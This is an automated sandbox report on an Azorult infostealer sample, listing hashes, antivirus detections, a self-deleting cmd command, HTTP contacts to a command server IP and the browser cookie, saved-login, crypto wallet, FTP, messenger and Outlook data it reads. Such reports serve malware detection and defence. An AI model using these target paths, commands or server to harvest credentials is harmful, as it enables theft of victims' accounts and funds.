· 6 years ago · Sep 05, 2019, 12:20 PM
1
2* ID: 1167
3* MalFamily: "Azorult"
4
5* MalScore: 10.0
6
7* File Name: "AZORult_2c5d4881d9b5ac60e71e03d033f0dbdf.exe"
8* File Size: 663552
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "f6590e0972571e2c0dde9810f5aa3af78a9813190a13561e195566fb88823a0d"
11* MD5: "2c5d4881d9b5ac60e71e03d033f0dbdf"
12* SHA1: "7d90e9fd7831c8b09f0587b78f6a261e19653170"
13* SHA512: "1f171f1cb6ab875e3d51adf101afdb3e231cde1be6a827359eb7b2d580b171f67c4dd035bf38f6b7a5629ae1c4da3cce5aa9c435bf6257b5af7f0c3e0480b175"
14* CRC32: "65F3CC4F"
15* SSDEEP: "6144:f0ZnddVyNen7hcaYkY2PW71CUBK/f6YTk7PoTRcV6V7kgY9fvVBVBR5jrLCuS0oK:sN8kKdcs6cBDL6D+Vf2DMf"
16
17* Process Execution:
18 "nUlIMci5lDcC.exe",
19 "nUlIMci5lDcC.exe",
20 "cmd.exe",
21 "timeout.exe",
22 "services.exe",
23 "lsass.exe"
24
25
26* Executed Commands:
27 "\"C:\\Users\\user\\AppData\\Local\\Temp\\nUlIMci5lDcC.exe\"",
28 "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\"",
29 "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\"",
30 "C:\\Windows\\system32\\lsass.exe",
31 "C:\\Windows\\system32\\timeout.exe 3"
32
33
34* Signatures Detected:
35
36 "Description": "Behavioural detection: Executable code extraction",
37 "Details":
38
39
40 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
41 "Details":
42
43
44 "Description": "Anomalous file deletion behavior detected (10+)",
45 "Details":
46
47 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\11276781929694657456500.tmp"
48
49
50 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\113282348866933851038344.tmp"
51
52
53 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\113282962236379443929750.tmp"
54
55
56 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\113283287057947681352380.tmp"
57
58
59 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
60
61
62 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
63
64
65 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat"
66
67
68 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll"
69
70
71 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll"
72
73
74 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll"
75
76
77 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll"
78
79
80 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll"
81
82
83 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll"
84
85
86 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll"
87
88
89 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll"
90
91
92 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll"
93
94
95 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll"
96
97
98 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll"
99
100
101 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll"
102
103
104 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll"
105
106
107 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll"
108
109
110 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll"
111
112
113 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll"
114
115
116 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll"
117
118
119 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll"
120
121
122 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll"
123
124
125 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll"
126
127
128 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll"
129
130
131 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll"
132
133
134 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll"
135
136
137 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll"
138
139
140 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll"
141
142
143 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll"
144
145
146 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll"
147
148
149 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll"
150
151
152 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll"
153
154
155 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll"
156
157
158 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll"
159
160
161 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll"
162
163
164 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll"
165
166
167 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll"
168
169
170 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll"
171
172
173 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll"
174
175
176 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll"
177
178
179 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll"
180
181
182 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll"
183
184
185 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll"
186
187
188 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll"
189
190
191 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll"
192
193
194 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll"
195
196
197 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll"
198
199
200 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll"
201
202
203 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll"
204
205
206 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll"
207
208
209 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll"
210
211
212 "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\nUlIMci5lDcC.exe"
213
214
215
216
217 "Description": "Performs HTTP requests potentially not found in PCAP.",
218 "Details":
219
220 "url_ioc": "45.76.87.43:80//index.php"
221
222
223 "url_ioc": "45.76.87.43:80//index.php"
224
225
226 "url_ioc": "45.76.87.43:80//update.exe"
227
228
229
230
231 "Description": "A process created a hidden window",
232 "Details":
233
234 "Process": "nUlIMci5lDcC.exe -> C:\\Windows\\System32\\cmd.exe"
235
236
237
238
239 "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
240 "Details":
241
242 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
243
244
245 "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
246
247
248 "suspicious_request_iocs": "http://45.76.87.43/index.php"
249
250
251 "suspicious_request_iocs": "http://45.76.87.43/update.exe"
252
253
254
255
256 "Description": "Performs some HTTP requests",
257 "Details":
258
259 "url_iocs": "http://45.76.87.43/index.php"
260
261
262 "url_iocs": "http://45.76.87.43/update.exe"
263
264
265
266
267 "Description": "Uses Windows utilities for basic functionality",
268 "Details":
269
270 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\""
271
272
273 "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\""
274
275
276
277
278 "Description": "Behavioural detection: Injection (Process Hollowing)",
279 "Details":
280
281 "Injection": "nUlIMci5lDcC.exe(3676) -> nUlIMci5lDcC.exe(1992)"
282
283
284
285
286 "Description": "Executed a process and injected code into it, probably while unpacking",
287 "Details":
288
289 "Injection": "nUlIMci5lDcC.exe(3676) -> nUlIMci5lDcC.exe(1992)"
290
291
292
293
294 "Description": "Deletes its original binary from disk",
295 "Details":
296
297
298 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
299 "Details":
300
301 "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 4910208 times"
302
303
304
305
306 "Description": "Steals private information from local Internet browsers",
307 "Details":
308
309 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@doubleclick1.txt"
310
311
312 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@advertising1.txt"
313
314
315 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.bing2.txt"
316
317
318 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@media2.txt"
319
320
321 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.google1.txt"
322
323
324 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google5.txt"
325
326
327 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google4.txt"
328
329
330 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google3.txt"
331
332
333 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@google1.txt"
334
335
336 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@c.msn2.txt"
337
338
339 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
340
341
342 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@msn1.txt"
343
344
345 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@www.msn2.txt"
346
347
348 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
349
350
351 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@3lift1.txt"
352
353
354 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@bing2.txt"
355
356
357 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@scorecardresearch2.txt"
358
359
360 "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
361
362
363 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\user@atwola2.txt"
364
365
366
367
368 "Description": "Collects information about installed applications",
369 "Details":
370
371 "Program": "Google Update Helper"
372
373
374
375
376 "Program": "Microsoft Excel MUI 2013"
377
378
379 "Program": "Microsoft Outlook MUI 2013"
380
381
382
383
384 "Program": "Google Chrome"
385
386
387 "Program": "Adobe Flash Player 29 NPAPI"
388
389
390 "Program": "Adobe Flash Player 29 ActiveX"
391
392
393 "Program": "Microsoft DCF MUI 2013"
394
395
396 "Program": "Microsoft Access MUI 2013"
397
398
399 "Program": "Microsoft Office Proofing Tools 2013 - English"
400
401
402 "Program": "Adobe Acrobat Reader DC"
403
404
405 "Program": "Microsoft Publisher MUI 2013"
406
407
408 "Program": "Microsoft Office Shared MUI 2013"
409
410
411 "Program": "Microsoft Office OSM MUI 2013"
412
413
414 "Program": "Microsoft InfoPath MUI 2013"
415
416
417 "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
418
419
420 "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
421
422
423 "Program": "Microsoft Word MUI 2013"
424
425
426 "Program": "Microsoft OneDrive"
427
428
429 "Program": "Microsoft Groove MUI 2013"
430
431
432 "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
433
434
435
436
437 "Program": "Microsoft Access Setup Metadata MUI 2013"
438
439
440 "Program": "Microsoft Office OSM UX MUI 2013"
441
442
443 "Program": "Java Auto Updater"
444
445
446 "Program": "Microsoft PowerPoint MUI 2013"
447
448
449 "Program": "Microsoft Office Professional Plus 2013"
450
451
452 "Program": "Adobe Refresh Manager"
453
454
455 "Program": "Microsoft Office Proofing 2013"
456
457
458 "Program": "Microsoft Lync MUI 2013"
459
460
461
462
463 "Program": "Microsoft OneNote MUI 2013"
464
465
466
467
468 "Description": "CAPE detected the Azorult malware family",
469 "Details":
470
471
472 "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
473 "Details":
474
475 "McAfee": "Fareit-FPT!2C5D4881D9B5"
476
477
478 "Cylance": "Unsafe"
479
480
481 "F-Prot": "W32/VBKrypt.SQ.gen!Eldorado"
482
483
484 "ESET-NOD32": "a variant of Win32/GenKryptik.DSDK"
485
486
487 "APEX": "Malicious"
488
489
490 "Endgame": "malicious (high confidence)"
491
492
493 "Invincea": "heuristic"
494
495
496 "McAfee-GW-Edition": "BehavesLike.Win32.Fareit.jh"
497
498
499 "Sophos": "Mal/FareitVB-N"
500
501
502 "SentinelOne": "DFI - Malicious PE"
503
504
505 "Cyren": "W32/VBKrypt.SQ.gen!Eldorado"
506
507
508 "Microsoft": "Trojan:Win32/Wacatac.B!ml"
509
510
511 "AhnLab-V3": "Trojan/Win32.Inject.R290159"
512
513
514 "Acronis": "suspicious"
515
516
517 "Qihoo-360": "HEUR/QVM03.0.ADF7.Malware.Gen"
518
519
520
521
522 "Description": "Checks the CPU name from registry, possibly for anti-virtualization",
523 "Details":
524
525
526 "Description": "Attempts to access Bitcoin/ALTCoin wallets",
527 "Details":
528
529 "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallets\\wallet.dat"
530
531
532 "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallets\\wallet.dat"
533
534
535 "file": "C:\\Users\\user\\AppData\\Roaming\\Adobe\\wallet.dat"
536
537
538 "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallets\\wallet.dat"
539
540
541 "file": "C:\\Users\\user\\AppData\\Roaming\\Sun\\wallet.dat"
542
543
544 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallets\\wallet.dat"
545
546
547 "file": "C:\\Users\\user\\AppData\\Roaming\\wallets\\wallet.dat"
548
549
550 "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallets\\wallet.dat"
551
552
553 "file": "C:\\Users\\user\\AppData\\wallets\\wallet.dat"
554
555
556 "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallet.dat"
557
558
559 "file": "C:\\Users\\user\\AppData\\Roaming\\Macromedia\\wallets\\wallet.dat"
560
561
562 "file": "C:\\Users\\user\\AppData\\wallet.dat"
563
564
565 "file": "C:\\Users\\user\\AppData\\Roaming\\wallet.dat"
566
567
568 "file": "C:\\Users\\user\\AppData\\Roaming\\Notepad++\\wallet.dat"
569
570
571 "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\wallet.dat"
572
573
574 "file": "C:\\Users\\user\\AppData\\Roaming\\Identities\\wallet.dat"
575
576
577 "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
578
579
580
581
582 "Description": "Harvests credentials from local FTP client softwares",
583 "Details":
584
585 "file": "C:\\Users\\user\\AppData\\Roaming\\filezilla\\recentservers.xml"
586
587
588
589
590 "Description": "Harvests information related to installed instant messenger clients",
591 "Details":
592
593 "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
594
595
596
597
598 "Description": "Harvests information related to installed mail clients",
599 "Details":
600
601 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
602
603
604 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
605
606
607 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
608
609
610 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
611
612
613 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
614
615
616 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
617
618
619 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
620
621
622 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
623
624
625 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
626
627
628 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
629
630
631 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
632
633
634 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
635
636
637 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
638
639
640 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
641
642
643 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
644
645
646 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
647
648
649 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
650
651
652 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
653
654
655 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
656
657
658 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
659
660
661 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
662
663
664
665
666 "Description": "Collects information to fingerprint the system",
667 "Details":
668
669
670 "Description": "Created network traffic indicative of malicious activity",
671 "Details":
672
673 "signature": "ET TROJAN Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration"
674
675
676
677
678 "Description": "Uses suspicious command line tools or Windows utilities",
679 "Details":
680
681 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\""
682
683
684 "command": "C:\\Windows\\System32\\cmd.exe /c C:\\Windows\\system32\\timeout.exe 3 & del \"nUlIMci5lDcC.exe\""
685
686
687
688
689
690* Started Service:
691 "VaultSvc"
692
693
694* Mutexes:
695 "A81FB8C60-BBE6E186-FC9B5DB5-36DA4559-33946726"
696
697
698* Modified Files:
699 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
700 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
701 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
702 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
703 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-1-0.dll",
704 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l1-2-0.dll",
705 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-file-l2-1-0.dll",
706 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-handle-l1-1-0.dll",
707 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-heap-l1-1-0.dll",
708 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-interlocked-l1-1-0.dll",
709 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-libraryloader-l1-1-0.dll",
710 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-localization-l1-2-0.dll",
711 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-memory-l1-1-0.dll",
712 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-namedpipe-l1-1-0.dll",
713 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processenvironment-l1-1-0.dll",
714 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-0.dll",
715 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-processthreads-l1-1-1.dll",
716 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-profile-l1-1-0.dll",
717 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-rtlsupport-l1-1-0.dll",
718 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-string-l1-1-0.dll",
719 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-1-0.dll",
720 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-synch-l1-2-0.dll",
721 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-sysinfo-l1-1-0.dll",
722 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-timezone-l1-1-0.dll",
723 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-util-l1-1-0.dll",
724 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-conio-l1-1-0.dll",
725 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-convert-l1-1-0.dll",
726 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-environment-l1-1-0.dll",
727 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-filesystem-l1-1-0.dll",
728 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-heap-l1-1-0.dll",
729 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-locale-l1-1-0.dll",
730 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-math-l1-1-0.dll",
731 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-multibyte-l1-1-0.dll",
732 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-private-l1-1-0.dll",
733 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-process-l1-1-0.dll",
734 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-runtime-l1-1-0.dll",
735 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-stdio-l1-1-0.dll",
736 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-string-l1-1-0.dll",
737 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-time-l1-1-0.dll",
738 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-crt-utility-l1-1-0.dll",
739 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\freebl3.dll",
740 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\mozglue.dll",
741 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\msvcp140.dll",
742 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nss3.dll",
743 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\nssdbm3.dll",
744 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\softokn3.dll",
745 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\ucrtbase.dll",
746 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\vcruntime140.dll",
747 "C:\\Users\\user\\AppData\\Local\\Temp\\11276781929694657456500.tmp",
748 "C:\\Users\\user\\AppData\\Local\\Temp\\113282348866933851038344.tmp",
749 "C:\\Users\\user\\AppData\\Local\\Temp\\113282962236379443929750.tmp",
750 "C:\\Users\\user\\AppData\\Local\\Temp\\113283287057947681352380.tmp",
751 "C:\\Users\\user\\AppData\\Local\\Temp\\update.exe"
752
753
754* Deleted Files:
755 "C:\\Users\\user\\AppData\\Local\\Temp\\11276781929694657456500.tmp",
756 "C:\\Users\\user\\AppData\\Local\\Temp\\113282348866933851038344.tmp",
757 "C:\\Users\\user\\AppData\\Local\\Temp\\113282962236379443929750.tmp",
758 "C:\\Users\\user\\AppData\\Local\\Temp\\113283287057947681352380.tmp",
759 "C:\\Users\\user\\AppData\\Local\\Temp\\curbuf.dat",
760 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-console-l1-1-0.dll",
761 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-datetime-l1-1-0.dll",
762 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-debug-l1-1-0.dll",
763 "C:\\Users\\user\\AppData\\Local\\Temp\\9FD6166A\\api-ms-win-core-errorhandling-l1-1-0.dll",
